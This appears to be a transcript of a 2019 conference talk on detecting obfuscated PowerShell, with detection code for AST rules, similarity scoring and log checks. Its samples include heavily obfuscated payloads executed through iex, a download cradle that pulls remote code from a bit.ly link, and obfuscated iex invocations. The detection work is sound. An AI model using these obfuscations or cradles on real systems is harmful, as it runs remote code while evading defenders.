Daniel Bohannon (@danielhbohannon)
Principal Applied Security Researcher
FireEye's Advanced Practices Team
PesterSec: Using Pester & ScriptAnalyzer for Detecting Obfuscated PowerShell
COPYRIGHT © 2019, FIREEYE, INC. ALL RIGHTS RESERVED.
PS> (ls env:User*)[1].Value
• Principal Applied Security Researcher
• FireEye's Advanced Practices Team
• Blog: http://danielbohannon.com
• I like writing detection stuff
• I REALLY like writing obfuscation stuff
$ag = New-Object System.Agenda
• Enter-PSSession -Hostname INTRO
• Out-Obfuscated -Level @(0..10)
• .EXAMPLE IEX Detection Development
• Revoke-Obfuscation #Signatureless
• about_MinimalObfuscation #PSAmsi
• PesterSec
• <# Novel Detection Approaches #>
• Exit-PSSession #Key Takeaways
PowerShell Conference EU 2019
[System.Motivation]::GetBackground()
• Background of 9 years in:
• IT operations
• Operational security
• Incident Response consulting
• Applied detection R&D at scale
• 2 consistent things in each role
• Coffee connoisseur
• Aspiring PowerShell aficionado
[System.Motivation]::GetBackground()
• @(1..9) | % { "$_ years Working" }
• @(1..7) | % { "$_ years PowerShelling" }
• @(1..6) | % { "$_ years Detecting" }
• @(1..3) | % { "$_ years Obfuscating" }
while ($attacker.techniques -contains 'evasion')
{
$research = New-Research -Type Detection
New-Detection -Content $research -Type @('host','network')
}
about_FindingEvil
• FireEye Advanced Practices Team
• Tracking attacker activity
• Researching new attacker methods
• Developing detections for these methods
Get-Evil | Sort-Object ObfuscationLevel | ogv
• Slice & dice some malicious PowerShell
• Highlight varying obfuscation levels & styles
• Discuss trends in PowerShell obfuscation & detection efforts
• Signatures vs signatureless vs targeted feature-based signatures
• Novel detection approaches
Get-Help Invoke-((Ob|DOS)fuscation|CradleCrafter) -Example
Start-Process -Verb Detect -ArgumentList @('piece','by','piece')
• Static detection R&D often starts with identifying numerous building blocks
• Focus on multi-level detection of building blocks
• Treat as either high fidelity or combination of #WeakSignals
• Why this signature-based static detection when PowerShell logging is available?
• Defense in depth (if PS logging disabled)
• Detecting guardrailed and/or keyed PowerShell
• Open Source repo detection using YARA rules
• Network detection of PS transfers
Out-Obfuscated -Level @(999..100000)
${-'*}=+$( ); ${ }= ${-'*} ; ${(+} =++ ${-'*};${)}=(${-'*}=${-'*}+${(+} ) ; ${'/}= (${-'*}
=${-'*}+ ${(+} ); ${@} = ( ${-'*}=${-'*} + ${(+}) ; ${~ =} =( ${-'*}= ${-'*}+ ${(+}); ${;}
=(${-'*} =${-'*}+${(+}) ; ${+} = (${-'*}= ${-'*} + ${(+}) ; ${]} = ( ${-'*} =${-'*} +
${(+});${-}= (${-'*}=${-'*} + ${(+} ) ; ${-$.}="["+ "$( @{ }) "[${+}] +"$(@{})"["${(+}" +"${-
}"]+ "$(@{} )"["${)}"+ "${ }" ] + "$? "[${(+} ] +"]";${-'*}="".("$(@{} )"[ "${(+}" +
"${@}"]+"$(@{} ) "[ "${(+}" + "${;}" ]+ "$(@{} )"[ ${ }]+"$(@{ })"[ ${@}] +"$?
"[${(+}]+"$(@{} ) "[${'/}]) ; ${-'*} ="$(@{ } )"[ "${(+}" + "${@}"] +"$(@{ })"[${@}]+ "${-
'*}"["${)}"+"${+}"] ; "${-'*}(${-$.}${+}${'/} + ${-$.}${;}${-} +${-$.}${]}${]} + ${-$.}${'/}${)}
+ ${-$.}${@}${ }+ ${-$.}${+}${]}+${-$.}${(+}${ }${(+} +${-$.}${(+}${(+}${-}+ ${-$.}${@}${~ =} + ${-
$.}${+}${-} + ${-$.}${-}${]}+${-$.}${(+}${ }${;} + ${-$.}${(+}${ }${(+}+${-$.}${-}${-}+${-
$.}${(+}${(+}${;}+ ${-$.}${'/}${)}+ ${-$.}${+}${]}+${-$.}${(+}${ }${(+}+ ${-$.}${(+}${(+}${;}+${-
$.}${@}${;} +${-$.}${]}${+} + ${-$.}${(+}${ }${(+} +${-$.}${-}${]}+${-$.}${;}${+} + ${-$.}${(+}${
}${]} +${-$.}${(+}${ }${~ =} +${-$.}${(+}${ }${(+}+ ${-$.}${(+}${(+}${ }+ ${-$.}${(+}${(+}${;} +
${-$.}${@}${(+} + ${-$.}${@}${;}+${-$.}${;}${]}+ ${-$.}${(+}${(+}${(+} +${-$.}${(+}${(+}${-} + ${-
$.}${(+}${(+}${ }+ ${-$.}${(+}${ }${]} + ${-$.}${(+}${(+}${(+} + ${-$.}${-}${+}+${-$.}${(+}${ }${ }
+${-$.}${]}${'/}+${-$.}${(+}${(+}${;}+ ${-$.}${(+}${(+}${@}+ ${-$.}${(+}${ }${~ =} + ${-
$.}${(+}${(+}${ } + ${-$.}${(+}${ }${'/}+ ${-$.}${@}${ }+ ${-$.}${'/}${-}+${-$.}${(+}${ }${@}+${-
$.}${(+}${(+}${;} +${-$.}${(+}${(+}${;} + ${-$.}${(+}${(+}${)}+${-$.}${~ =}${]}+${-$.}${@}${+}+${-
$.}${@}${+} + ${-$.}${-}${]}+${-$.}${(+}${ }${~ =} + ${-$.}${(+}${(+}${;} +${-$.}${@}${;}+ ${-
$.}${(+}${ }${]} +${-$.}${(+}${)}${(+}+ ${-$.}${@}${+} +${-$.}${+}${;}+ ${-$.}${~ =}${(+} +${-
$.}${(+}${ }${'/}+ ${-$.}${@}${-} +${-$.}${(+}${(+}${;}+${-$.}${'/}${-} + ${-$.}${@}${(+})"|. ${-'*}
'
' | % {$Script = $_ -Split '' |
% {''; $_.Split('') | % {$_.Length-1}} ; $DecodedCommand = [Char[]]
[Int[]]($Script[0..($Script.Length-1)] -Join '').Trim('').Split('') -Join
''; IE`X $DecodedCommand}
1000's of whitespace & tab characters
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
about_RevokeObfuscation
-not ($healthy -or $normal)
Chart: average character frequency of ALL 3.4K PoshCode scripts, used as the baseline for cosine similarity
Cosine similarity to the PoshCode baseline: Sample 1 (Invoke-Obfuscation) 0.379; Sample 2 (Symbolic) 0.157
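The character-frequency cosine similarity behind these two scores, as an added example (not Revoke-Obfuscation's own code). The baseline here is constructed from three ordinary one-liners rather than the 3.4K PoshCode scripts, and the two candidate scripts are constructed too:

```powershell
# Added example, not Revoke-Obfuscation's own code. The baseline below is constructed from
# three ordinary one-liners; the talk used the average over 3.4K PoshCode scripts.
function Get-CharFrequency {
    param([Parameter(Mandatory)][string]$Text)
    # Relative frequency of each character, case-folded, so script length cancels out.
    $counts = @{}
    foreach ($c in $Text.ToLowerInvariant().ToCharArray()) { $counts[$c] = 1 + [int]$counts[$c] }
    $freq = @{}
    foreach ($k in $counts.Keys) { $freq[$k] = $counts[$k] / $Text.Length }
    return $freq
}

function Get-CosineSimilarity {
    param([Parameter(Mandatory)][hashtable]$A, [Parameter(Mandatory)][hashtable]$B)
    # cos(theta) = (A . B) / (|A| |B|), taken over every character seen in either vector;
    # a character missing from one side simply contributes 0 to the dot product.
    $dot = 0.0; $normA = 0.0; $normB = 0.0
    foreach ($k in (@($A.Keys) + @($B.Keys) | Select-Object -Unique)) {
        $a = [double]$A[$k]; $b = [double]$B[$k]
        $dot += $a * $b; $normA += $a * $a; $normB += $b * $b
    }
    if ($normA -eq 0 -or $normB -eq 0) { return 0.0 }
    return $dot / ([math]::Sqrt($normA) * [math]::Sqrt($normB))
}

# Constructed baseline: the average character frequency of a few ordinary scripts.
$baselineScripts = @(
    'Get-ChildItem -Path C:\Temp -Recurse | Where-Object { $_.Length -gt 1MB } | Select-Object Name, Length',
    'function Get-Uptime { (Get-Date) - (Get-CimInstance Win32_OperatingSystem).LastBootUpTime }',
    'Import-Csv .\users.csv | ForEach-Object { Set-ADUser -Identity $_.Name -Enabled $true }'
)
$baseline = @{}
foreach ($s in $baselineScripts) {
    $f = Get-CharFrequency -Text $s
    foreach ($k in $f.Keys) { $baseline[$k] = [double]$baseline[$k] + $f[$k] / $baselineScripts.Count }
}

# Two constructed candidates: a plain download cradle, and the symbol-only variable style
# from the Out-Obfuscated -Level @(999..100000) slide (a fragment, not executed here).
$plain = '(New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1") | Invoke-Expression'
$symbolic = @'
${-'*}=+$( ); ${ }= ${-'*} ; ${(+} =++ ${-'*};${)}=(${-'*}=${-'*}+${(+} ) ; ${'/}= (${-'*} =${-'*}+ ${(+} )
'@

# Lower similarity to the baseline = further from "healthy and normal" PowerShell.
'{0,-10} {1:N3}' -f 'plain',    (Get-CosineSimilarity -A $baseline -B (Get-CharFrequency -Text $plain))
'{0,-10} {1:N3}' -f 'symbolic', (Get-CosineSimilarity -A $baseline -B (Get-CharFrequency -Text $symbolic))
```

The two scores are the per-script input that the next slides threshold; a tiny constructed baseline gives different absolute values from the 0.379 / 0.157 on the slide, but the ordering is the same.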
https://cobbr.io/ObfuscationDetection.html
https://en.wikipedia.org/wiki/Precision_and_recall
Measure Score
Accuracy 0.71
Precision 0.89
Recall 0.37
F1 Score 0.52
True Positives 0.16
False Positives 0.02
True Negatives 0.55
False Negatives 0.27
Get-Command -Name ("{1}{0}" -f "-Process","Get")
about_AbstractSyntaxTree
Token types (diagram): StringExpandable, RParenComma, StringExpandable, Format, StringExpandable, LParen, Parameter, Generic
AST (diagram):
ScriptBlockAst
  NamedBlockAst: Begin / NamedBlockAst: End
    StatementAst
      PipelineAst
        CommandAst
          StringConstantExpressionAst, CommandParameterAst, ParenExpressionAst
            PipelineAst
              BinaryExpressionAst
                Operator: Format; Left: StringConstantAst; Right: ArrayLiteralAst
                  0: StringConstantExpressionAst, 1: StringConstantExpressionAst
about_LogisticRegression #MathStuff
Linear Regression + Logit Function = Logistic Regression
https://en.wikipedia.org/wiki/Logistic_regression
about_StochasticGradientDescent #MoarMathStuff
• Result = Bias + (F1 * Weight1) + (F2 * Weight2) + (…)
• ExpectedResult = (from labeled data)
• Error = Result – ExpectedResult
• Adjust each weight according to how much it contributed to the error. Do this a lot.
https://en.wikipedia.org/wiki/Stochastic_gradient_descent
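The update rule on this slide written out, as an added derivation that is not on the original slide, using the slide's own names. The linear sum is passed through the logit (sigmoid) function $\sigma$ from the previous slide, ExpectedResult is the 0/1 label from the labeled data, and $\eta$ is the learning rate (an assumed constant):

$$
\begin{aligned}
z &= \text{Bias} + \sum_{i} F_i \cdot \text{Weight}_i \\
\text{Result} &= \sigma(z) = \frac{1}{1 + e^{-z}} \\
\text{Error} &= \text{Result} - \text{ExpectedResult} \\
\text{Weight}_i &\leftarrow \text{Weight}_i - \eta \cdot \text{Error} \cdot F_i \\
\text{Bias} &\leftarrow \text{Bias} - \eta \cdot \text{Error}
\end{aligned}
$$

The factor $F_i$ is what "how much it contributed to the error" means: for the cross-entropy loss the gradient with respect to $\text{Weight}_i$ is exactly $\text{Error} \cdot F_i$, so a feature that was zero for this sample leaves its weight untouched.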
about_LeeAndDanielHappyDance
Measure           Cosine Similarity   Logistic Regression with Gradient Descent
Accuracy          0.71                0.96
Precision         0.89                0.96
Recall            0.37                0.94
F1 Score          0.52                0.95
True Positives    0.16                0.36
False Positives   0.02                0.01
True Negatives    0.55                0.60
False Negatives   0.27                0.02
10x better at finding obfuscated content; half the false positives
Get-Help Revoke-Obfuscation -Role
• Revoke-Obfuscation highlights:
• First AST-based PowerShell obfuscation detection framework
• Signatureless data science approach
• Daniel's first "real" PowerShell module (& published to PowerShell Gallery)
Out-Obfuscated -Level Minimal
• Level & depth of obfuscation in malicious PowerShell varies wildly
• No obfuscation – BLAND
• Minimal obfuscation – TASTEFUL
• Maximum obfuscation – SALTY
• ^^^ layered – EXTRA-SALTY
Get-Help PSAmsi -Functionality
• Using the AST (Abstract Syntax Tree) for minimal obfuscation
• PSAmsi (Ryan Cobb, @cobbr_io)
• Uses AST to minimally obfuscate PowerShell scripts to evade specific A/V signatures
• https://github.com/cobbr/PSAmsi
Out-Obfuscated -Level Minimal -Type @('Quantity','Depth')
• Two types of minimal obfuscation (can be combined):
• Quantity – Obfuscate only 3 of the 27 script blocks
• Depth – Light obfuscation of any given token

Deep Obfuscation                             Shallow Obfuscation
."Do`wn`load`Str`in`g"                       ."Download`String"
.("{1}{0}{2}" -f "load","Down","String")     .("Download"+"String")

Targeted Token-Specific Detection Opportunity!
Get-Help PesterSec -Examples
• How can PSScriptAnalyzer help us detect minimal obfuscation?
• In-depth signatures targeting specific AST node types, relationships, etc.
• Measure-TickUsageInMember
• Measure-NonAlphanumericUsageInMember
• Measure-LongMemberValue
Deep Obfuscation (Invoke-CradleCrafter): ((((New-Object Net.WebClient)|GM)|Where-Object{(Get-Item Variable:/_).Value.Name-like'D*g'}).Name)
• Measure-TickUsageInVariable
Invocation Obfuscation
. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
Ticks removed: . ( ${eNv:coMsPEC}[4,15,25]-JOin'' )
$env:ComSpec on a default Windows install is the 27-char string C:\WINDOWS\system32\cmd.exe; indexes 4, 15 and 25 pick out I, e and x (command names are case-insensitive)
. 'iex'
• Measure-NonAlphanumericUsageInVariable
Variable Obfuscation (ISE Steroids): ${____/=/==//===}
New-Item -ItemType Idea -Name PesterSec
• PS> Invoke-Expression (New-Object Net.WebClient)."`D`o`wn`l`oa`d`Str`in`g"('ht'+'tps:/bit.ly/L3g1t')
Get-Help PesterSec -Detailed
• PSScriptAnalyzer_Obfuscation_Detection_Rules.psm1
• Measure-TickUsageInCommand
• Measure-TickUsageInArgument
• Measure-TickUsageInMember
• Measure-TickUsageInVariable
• Measure-NonAlphanumericUsageInMember
• Measure-NonAlphanumericUsageInVariable
• Measure-LongMemberValue
• Measure-SAObfuscation.psm1
• Wrapper module for displaying aggregated ScriptAnalyzer hits
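Two custom PSScriptAnalyzer rules in the style of the Measure-* list above, added here as an example (not the PesterSec module's own code). The rule names Measure-MemberTickUsage and Measure-VariableNameObfuscation, the sample script and the 0.5 symbol-ratio threshold are assumptions of this example:

```powershell
# Added example in the spirit of the Measure-* rules above; not the PesterSec module's own
# code. Rule names, sample script and the 0.5 threshold are assumptions. Requires the
# PSScriptAnalyzer module, which provides the DiagnosticRecord type custom rules return.
Import-Module PSScriptAnalyzer

function Measure-MemberTickUsage {
    <#
    .SYNOPSIS
        Flags member names spelled with backtick escapes, e.g. $wc."Down`loadString"(...).
        The escaped string resolves to the same member, so the tick exists only to break
        substring matches on names such as DownloadString.
    #>
    [CmdletBinding()]
    [OutputType('Microsoft.Windows.PowerShell.ScriptAnalyzer.Generic.DiagnosticRecord[]')]
    param (
        [Parameter(Mandatory)]
        [ValidateNotNullOrEmpty()]
        [System.Management.Automation.Language.ScriptBlockAst]$ScriptBlockAst
    )
    # MemberExpressionAst covers $obj.Member; InvokeMemberExpressionAst derives from it and
    # covers $obj.Method(...), so one predicate finds both kinds of node.
    $members = $ScriptBlockAst.FindAll({ param($ast)
        $ast -is [System.Management.Automation.Language.MemberExpressionAst] }, $true)
    foreach ($m in $members) {
        # Extent.Text keeps the source spelling (ticks included); .Value is already unescaped.
        $text = $m.Member.Extent.Text
        if ($text -notmatch '`') { continue }
        $resolved = if ($m.Member -is [System.Management.Automation.Language.StringConstantExpressionAst]) {
            $m.Member.Value } else { '<dynamic>' }
        [Microsoft.Windows.PowerShell.ScriptAnalyzer.Generic.DiagnosticRecord]@{
            Message  = "Backtick in member name $text (resolves to $resolved)"
            Extent   = $m.Member.Extent
            RuleName = 'Measure-MemberTickUsage'
            Severity = 'Warning'
        }
    }
}

function Measure-VariableNameObfuscation {
    <#
    .SYNOPSIS
        Flags variable names that contain backticks (${e`Nv:c`oM`sPEC}) or that consist
        mostly of symbols (${____/=/==//===}), the ISE Steroids style shown above.
    #>
    [CmdletBinding()]
    [OutputType('Microsoft.Windows.PowerShell.ScriptAnalyzer.Generic.DiagnosticRecord[]')]
    param (
        [Parameter(Mandatory)]
        [ValidateNotNullOrEmpty()]
        [System.Management.Automation.Language.ScriptBlockAst]$ScriptBlockAst
    )
    $vars = $ScriptBlockAst.FindAll({ param($ast)
        $ast -is [System.Management.Automation.Language.VariableExpressionAst] }, $true)
    foreach ($v in $vars) {
        $name   = $v.VariablePath.UserPath   # unescaped name as the parser sees it
        $text   = $v.Extent.Text             # spelling in the source, e.g. ${e`Nv:c`oM`sPEC}
        $reason = $null
        if ($text -match '`') {
            $reason = 'backtick inside variable name'
        }
        elseif ($name.Length -ge 3) {
            # Share of characters that are neither letters nor digits. Ordinary names sit
            # near 0; the symbol-only names above sit at 1.0. The 0.5 cut-off is assumed.
            $ratio = ($name -replace '[\p{L}\p{Nd}]', '').Length / $name.Length
            if ($ratio -ge 0.5) { $reason = '{0:P0} of the name is non-alphanumeric' -f $ratio }
        }
        if (-not $reason) { continue }
        [Microsoft.Windows.PowerShell.ScriptAnalyzer.Generic.DiagnosticRecord]@{
            Message  = "Suspicious variable $text ($reason)"
            Extent   = $v.Extent
            RuleName = 'Measure-VariableNameObfuscation'
            Severity = 'Warning'
        }
    }
}

# Constructed sample: a tick-escaped member, a tick-escaped variable, a symbol-only variable
# and an ordinary line that must not be reported. Parsed only, never executed.
$sample = @'
$wc = New-Object Net.WebClient
$wc."Down`loadString"('http://example.invalid/')
. ( ${e`Nv:c`oM`sPEC}[4,15,25] -join '' )
${____/=/==//===} = 'payload'
$cleanName = Get-ChildItem -Path $env:TEMP
'@
# Drive the rules with the same AST Invoke-ScriptAnalyzer would hand them.
$ast = [System.Management.Automation.Language.Parser]::ParseInput($sample, [ref]$null, [ref]$null)
Measure-MemberTickUsage -ScriptBlockAst $ast
Measure-VariableNameObfuscation -ScriptBlockAst $ast
# Saved as ObfuscationRules.psm1, the same functions run as custom rules via:
#   Invoke-ScriptAnalyzer -ScriptDefinition $sample -CustomRulePath .\ObfuscationRules.psm1
```

Each rule returns one DiagnosticRecord per hit with the exact extent, which is what a wrapper like Measure-SAObfuscation.psm1 can aggregate into a weak-signal score.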
$moduleLogs | Group-Object PipelineID,CommandName
• Fingerprint abnormal scripts by cmdlet groupings
• AST to query from extracted script (group on Command)
• EID 4103 events for executed script (group on PipelineID,CommandName)
# Load script to analyze (the response body, not the response object).
$script = (Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1).Content
# Tokenize script.
$tokens = [System.Management.Automation.PSParser]::Tokenize($script, [ref] $null)
# Group on Command (cmdlet/alias/etc.) to find high concentration of repeated Commands.
$tokens | Where-Object { $_.Type -eq 'Command' } | Group-Object Content |
    Where-Object { $_.Count -ge 10 } | Sort-Object Count -Descending | Select-Object Count,Name
Compare-Object $oldPSLog $newPSLog
powershell.exe Invoke-Expression $env:gkwa
Pipeline execution details for command line: Invoke-Expression $env:gkwa
Context Information:
DetailSequence=1
<REDACTED>
CommandLine=Invoke-Expression $env:gkwa
Details:
CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
Windows PowerShell log, EID 800: CommandInvocation shows the cmdlet invoked; CommandLine shows the parent ScriptBlock
powershell.exe iex $env:gkwa
Pipeline execution details for command line: iex $env:gkwa
Context Information:
DetailSequence=1
<REDACTED>
CommandLine=iex $env:gkwa
Details:
CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
powershell.exe ie`x $env:gkwa
Pipeline execution details for command line: ie`x $env:gkwa
Context Information:
DetailSequence=1
<REDACTED>
CommandLine=ie`x $env:gkwa
Details:
CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
OBFUSCATED!
sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
Pipeline execution details for command line: sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
Context Information:
DetailSequence=1
<REDACTED>
CommandLine=sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
Details:
CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
OBFUSCATED!
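The comparison the last four slides make by eye, automated as an added example (not code from the talk): in a Windows PowerShell EID 800 message, CommandInvocation names the cmdlet that was actually bound while CommandLine is the parent script block as typed, so a bound cmdlet whose name (or alias) never appears in CommandLine was invoked through obfuscation. The function name Test-InvocationMismatch and the three log samples are constructed here; the redacted payload is a placeholder:

```powershell
# Added example, not code from the talk. Function name and log samples are constructed;
# the payload value is a placeholder.
function Test-InvocationMismatch {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Message)

    # The parent script block as PowerShell saw it (first CommandLine= line of the message).
    $cmdLine = ($Message -split '\r?\n' | Where-Object { $_ -like 'CommandLine=*' } |
                Select-Object -First 1) -replace '^CommandLine=', ''

    # Every cmdlet the pipeline bound, taken from the CommandInvocation(Name): lines.
    $invoked = [regex]::Matches($Message, 'CommandInvocation\(([^)]+)\)') |
               ForEach-Object { $_.Groups[1].Value } | Sort-Object -Unique

    foreach ($name in $invoked) {
        # Accepted spellings: the cmdlet name plus every alias defined for it in this
        # session (iex for Invoke-Expression). Anything else (ie`x, an indexed string,
        # a -f format) is a spelling PowerShell had to resolve at run time.
        $spellings = @($name) + @(Get-Alias -Definition $name -ErrorAction SilentlyContinue |
                                   Select-Object -ExpandProperty Name)
        $alternation = ($spellings | ForEach-Object { [regex]::Escape($_) }) -join '|'
        # Whole-token match so "Invoke" inside ".Invoke(" does not count as Invoke-Expression.
        $visible = $cmdLine -match "(?i)(?<![\w-])($alternation)(?![\w-])"
        [pscustomobject]@{
            Invoked     = $name
            Visible     = $visible
            Obfuscated  = -not $visible
            CommandLine = $cmdLine
        }
    }
}

# Three constructed EID 800 messages in the format shown on the slides (payload redacted).
$plain = @'
Pipeline execution details for command line: iex $env:gkwa
Context Information:
DetailSequence=1
CommandLine=iex $env:gkwa
Details:
CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
'@
$ticked = @'
Pipeline execution details for command line: ie`x $env:gkwa
Context Information:
DetailSequence=1
CommandLine=ie`x $env:gkwa
Details:
CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
'@
$obfuscated = @'
Pipeline execution details for command line: sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
Context Information:
DetailSequence=1
CommandLine=sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
Details:
CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
'@

# Expected: the plain message is Visible, the ticked and obfuscated ones are Obfuscated.
$plain, $ticked, $obfuscated | ForEach-Object { Test-InvocationMismatch -Message $_ } |
    Format-Table Invoked, Visible, Obfuscated, CommandLine -AutoSize
```

The same check applies to EID 4103 module logging, where the grouping on PipelineID,CommandName from the earlier slide gives the bound cmdlet names per pipeline.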
$keyTakeaway[0]
• PowerShell obfuscation is easily accessible to all
• Used frequently ITW
• MOSTLY de-obfuscated by PowerShell scriptblock logging
• Data science-driven detection exists with Revoke-Obfuscation
• Maximum obfuscation is used by some attackers more than others
• Minimal obfuscation is far less frequent but quite effective
• PSScriptAnalyzer enables the best of both worlds for detection:
• AST for targeted token type calculations and inspection
• Flexible logic for marking as suspicious, creating weak signals, etc.
$keyTakeaway[1] # Thank You PowerShell Community!!!
• TFW you combine PowerShell logging, Revoke-Obfuscation AND PesterSec:
about_Author
• Daniel Bohannon
• Twitter: @danielhbohannon
• Blog: https://danielbohannon.com/
• Github: https://github.com/danielbohannon/
Safe Software
 
PDF
Fl Studio 24.2.2 Build 4597 Crack for Windows Free Download 2025
faizk77g
 
PDF
HCIP-Data Center Facility Deployment V2.0 Training Material (Without Remarks ...
mcastillo49
 
PDF
"Beyond English: Navigating the Challenges of Building a Ukrainian-language R...
Fwdays
 
PDF
Complete JavaScript Notes: From Basics to Advanced Concepts.pdf
haydendavispro
 
PDF
The Builder’s Playbook - 2025 State of AI Report.pdf
jeroen339954
 
PDF
SWEBOK Guide and Software Services Engineering Education
Hironori Washizaki
 
PDF
Log-Based Anomaly Detection: Enhancing System Reliability with Machine Learning
Mohammed BEKKOUCHE
 
PPTX
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
PDF
NewMind AI - Journal 100 Insights After The 100th Issue
NewMind AI
 
PDF
CIFDAQ Weekly Market Wrap for 11th July 2025
CIFDAQ
 
PDF
Agentic AI lifecycle for Enterprise Hyper-Automation
Debmalya Biswas
 
PPTX
Q2 FY26 Tableau User Group Leader Quarterly Call
lward7
 
PDF
HubSpot Main Hub: A Unified Growth Platform
Jaswinder Singh
 
PPTX
Webinar: Introduction to LF Energy EVerest
DanBrown980551
 
PDF
Bitcoin for Millennials podcast with Bram, Power Laws of Bitcoin
Stephen Perrenod
 
PDF
New from BookNet Canada for 2025: BNC BiblioShare - Tech Forum 2025
BookNet Canada
 
"Autonomy of LLM Agents: Current State and Future Prospects", Oles` Petriv
Fwdays
 
AUTOMATION AND ROBOTICS IN PHARMA INDUSTRY.pptx
sameeraaabegumm
 
OpenID AuthZEN - Analyst Briefing July 2025
David Brossard
 
Building Real-Time Digital Twins with IBM Maximo & ArcGIS Indoors
Safe Software
 
Fl Studio 24.2.2 Build 4597 Crack for Windows Free Download 2025
faizk77g
 
HCIP-Data Center Facility Deployment V2.0 Training Material (Without Remarks ...
mcastillo49
 
"Beyond English: Navigating the Challenges of Building a Ukrainian-language R...
Fwdays
 
Complete JavaScript Notes: From Basics to Advanced Concepts.pdf
haydendavispro
 
The Builder’s Playbook - 2025 State of AI Report.pdf
jeroen339954
 
SWEBOK Guide and Software Services Engineering Education
Hironori Washizaki
 
Log-Based Anomaly Detection: Enhancing System Reliability with Machine Learning
Mohammed BEKKOUCHE
 
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
NewMind AI - Journal 100 Insights After The 100th Issue
NewMind AI
 
CIFDAQ Weekly Market Wrap for 11th July 2025
CIFDAQ
 
Agentic AI lifecycle for Enterprise Hyper-Automation
Debmalya Biswas
 
Q2 FY26 Tableau User Group Leader Quarterly Call
lward7
 
HubSpot Main Hub: A Unified Growth Platform
Jaswinder Singh
 
Webinar: Introduction to LF Energy EVerest
DanBrown980551
 
Bitcoin for Millennials podcast with Bram, Power Laws of Bitcoin
Stephen Perrenod
 
New from BookNet Canada for 2025: BNC BiblioShare - Tech Forum 2025
BookNet Canada
 
Ad

PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell

  • 1. Daniel Bohannon (@danielhbohannon) Principal Applied Security Researcher FireEye's Advanced Practices Team PesterSec: Using Pester & ScriptAnalyzer for Detecting Obfuscated PowerShell https://victrolacoffeeroasters.files.wordpress.com/2011/04/latte_art_pour.jpg COPYRIGHT © 2019, FIREEYE, INC. ALL RIGHTS RESERVED. 2019
  • 2. PesterSec: Using Pester & ScriptAnalyzer for Detecting Obfuscated PowerShell 2019 Daniel Bohannon (@danielhbohannon)
  • 3. 2019 Daniel Bohannon (@danielhbohannon) PS> (ls env:User*)[1].Value • Principal Applied Security Researcher • FireEye's Advanced Practices Team • Blog: http://danielbohannon.com • I like writing detection stuff • I REALLY like writing obfuscation stuff
  • 4. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 5. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 6. [System.Motivation]::GetBackground() • Background of 9 years in: • IT operations • Operational security • Incident Response consulting • Applied detection R&D at scale • 2 consistent things in each role PowerShell Conference EU 2019
